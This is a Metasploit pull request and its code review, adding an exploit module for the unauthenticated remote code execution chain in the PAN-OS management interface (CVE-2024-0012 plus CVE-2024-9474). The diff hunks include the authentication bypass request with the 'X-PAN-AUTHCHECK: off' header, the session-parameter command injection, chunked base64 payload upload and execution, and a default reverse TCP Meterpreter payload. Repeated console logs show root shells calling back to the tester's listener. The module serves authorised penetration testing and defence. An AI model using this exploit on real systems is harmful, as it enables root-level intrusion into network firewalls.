### PR TITLE
Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474)

### PR DESCRIPTION
**Pull request by sfewer-r7**
This pull request adds an exploit module for the recent PAN-OS management interface unauthenticated RCE exploit chain (CVE-2024-0012 + CVE-2024-9474), based upon the technical analysis published by [watchTowr](https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/).

The exploit module has been tested against PAN-OS `10.2.8` and `11.1.4`.

## Example

```
msf6 exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:52828) at 2024-11-19 16:09:19 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.100
OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### CODE REVIEW

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 1]
```diff
@@ -0,0 +1,197 @@
...
+  # chunks. Additionally, the command injection may trigger twice per invocation. To overcome this we store each
+  # chunk in a unique, sequential file, so that if invoked twice, we still end up with the same file for that chunk.
+  # We then amalgamate all these chunks together into a single file, reconstituting the original base64 encoded
+  # payload, Finally we base64 decode the payload, and pipe it to a shell to execute. To avoid our payload being
+  # executed twice, the payload will delete the single base64 payload file upon the first execution of the payload,
+  # causing any second attempt to execute the payload to fail.
+  def exploit
+    tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
+
+    cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*; #{payload.encoded}"
```
Comment (jvoisin) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:107]:
```suggestion
    cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
```
golfing!

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 2]
```diff
@@ -0,0 +1,197 @@
...
+
+    while payload && !payload.empty?
+
+      print_status("Uploading payload chunk #{idx} of #{max_idx}...")
+
+      chunk = payload[0, chunk_size]
+
+      payload = payload[chunk_size..]
+
+      execute_cmd("echo -n '#{chunk}' > #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
```
Comment (jvoisin) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:125]:
```suggestion
      execute_cmd("echo -n '#{chunk}'>#{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
```

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 3]
```diff
@@ -0,0 +1,197 @@
...
+          # Technical Analysis
+          ['URL', 'https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/']
+        ],
+        'DisclosureDate' => '2024-11-18',
+        'Platform' => [ 'linux', 'unix' ],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Executes as root on Linux
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
```
Comment (sjanusz-r7) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:48]: We should be able to remove the default payload here
```suggestion
```
and might include a comment saying what payloads were tested and working

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 4]
```diff
@@ -0,0 +1,197 @@
...
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
```
Comment (sjanusz-r7) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:13]: Can we register a Writable Dir datastore option for this module?

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 5]
```diff
@@ -0,0 +1,197 @@
...
+  # We then amalgamate all these chunks together into a single file, reconstituting the original base64 encoded
+  # payload, Finally we base64 decode the payload, and pipe it to a shell to execute. To avoid our payload being
+  # executed twice, the payload will delete the single base64 payload file upon the first execution of the payload,
+  # causing any second attempt to execute the payload to fail.
+  def exploit
+    tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
+
+    cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*; #{payload.encoded}"
+
+    payload = Base64.strict_encode64(cmd)
```
Comment (sjanusz-r7) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:109]: Can we check if the existing encoding is sufficient? Currently it seems like we are encoding the payload twice: once with `payload.encoded` and then calling `strict_encode64`.

File: modules/exploits/linux/http/panos_management_unauth_rce.rb (hunk 3 above)
Comment (sfewer-r7) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb]: addressed via commit [f9b099a](https://github.com/rapid7/metasploit-framework/pull/19663/commits/f9b099a46dce442eb634515f29a837cd3a5b5315)

File: modules/exploits/linux/http/panos_management_unauth_rce.rb (hunk 4 above)
Comment (sfewer-r7) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb:13]: addressed via commit [d2f6e0e](https://github.com/rapid7/metasploit-framework/pull/19663/commits/d2f6e0e10fbad82ddd5e12b908299d2caa008d54)

File: modules/exploits/linux/http/panos_management_unauth_rce.rb (hunk 5 above)
Comment (sfewer-r7) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb]: This has been addressed with commit [41bcf46](https://github.com/rapid7/metasploit-framework/pull/19663/commits/41bcf4629ff507a3d83a50ce959056576481b207).

File: modules/exploits/linux/http/panos_management_unauth_rce.rb (hunk 2 above)
Comment (jvoisin) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb]: This would allow to send two more chars of the payload per iteration.

Comment (sfewer-r7) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb]: I added commit [de599a4](https://github.com/rapid7/metasploit-framework/pull/19663/commits/de599a4407f0249909e427dc33130a38e64ffb26) which now calculates the max size a chunk can be for any iteration of writing a chunk. I also reworked how the files are made to be sequential when amalgamating them, which affects the chunk size. Thanks @jvoisin, appreciate you review :)

**Comment by sfewer-r7** [comment]
Note, commit [de599a4](https://github.com/rapid7/metasploit-framework/pull/19663/commits/de599a4407f0249909e427dc33130a38e64ffb26) fixes a bug in how the individual chunk files are ensured to be sequential, and introduces a max payload size of 5670 chars, as we now need to decrement the chunk size by 1 character every 9 chunks.

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 6]
```diff
@@ -0,0 +1,247 @@
...
+
+    vprint_status(user)
+
+    # Leverage the auth bypass (CVE-2024-0012) and poison a session parameter with the command to execute (CVE-2024-9474).
+    res1 = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('php', 'utils', 'createRemoteAppwebSession.php', "#{Rex::Text.rand_text_alphanumeric(8)}.js.map"),
+      'headers' => {
+        'X-PAN-AUTHCHECK' => 'off'
+      },
```
Comment (jheysel-r7) [inline modules/exploits/linux/http/panos_management_unauth_rce.rb:205]:
```suggestion
      },
      'keep_cookies' => true,
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the great module @sfewer-r7! 

I had one suggestion with regards to how you were extracting the `PHPSESSID` from the response. There was nothing wrong with what you were doing but we do general encourage people to use the `cookie_jar` functionality when possible. 

Other than that everything looks great and testing was as expected. 
```
msf6 exploit(linux/http/panos_management_unauth_rce) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.65:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.1.93
[*] Meterpreter session 3 opened (192.168.1.65:4444 -> 192.168.1.93:50204) at 2024-12-09 11:02:49 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.93
OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

File: modules/exploits/linux/http/panos_management_unauth_rce.rb [hunk 7]
```diff
@@ -0,0 +1,247 @@
...
+      end
+
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /php/utils/createRemoteAppwebSession.php')
+    end
+
+    php_session_id = res1.body.to_s.match(/PHPSESSID=([a-z0-9]+)@/)
+
+    unless php_session_id
+      fail_with(Failure::UnexpectedReply, 'No PHPSESSID returned')
+    end
```
[the remark this answers is not in the document]
Comment (sfewer-r7) [reply modules/exploits/linux/http/panos_management_unauth_rce.rb]: resolved in [edf8d18](https://github.com/rapid7/metasploit-framework/pull/19663/commits/edf8d186f77a9106dccde1ab01d4ec5352f62bf6)

**Comment by sfewer-r7** [comment]
Thanks @jheysel-r7 for the testing and improvements. I committed your cookie jar improvement in [edf8d18](https://github.com/rapid7/metasploit-framework/pull/19663/commits/edf8d186f77a9106dccde1ab01d4ec5352f62bf6).

**Comment by jheysel-r7** [comment]
Thanks for making those changes @sfewer-r7! Retested and working as expected. Landing now 👍 
```
msf6 exploit(linux/http/panos_management_unauth_rce) > run

[*] Started reverse TCP handler on 192.168.1.65:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.1.93
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.93:33086) at 2024-12-30 10:25:29 -0800


meterpreter >
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.93
OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

**Review by jheysel-r7 — APPROVED** [review]

**Comment by jheysel-r7** [comment]
# Release Notes 

Adds an exploit module for the recent PAN-OS management interface unauthenticated RCE exploit chain for CVE-2024-0012 + CVE-2024-9474

**Pull request merged**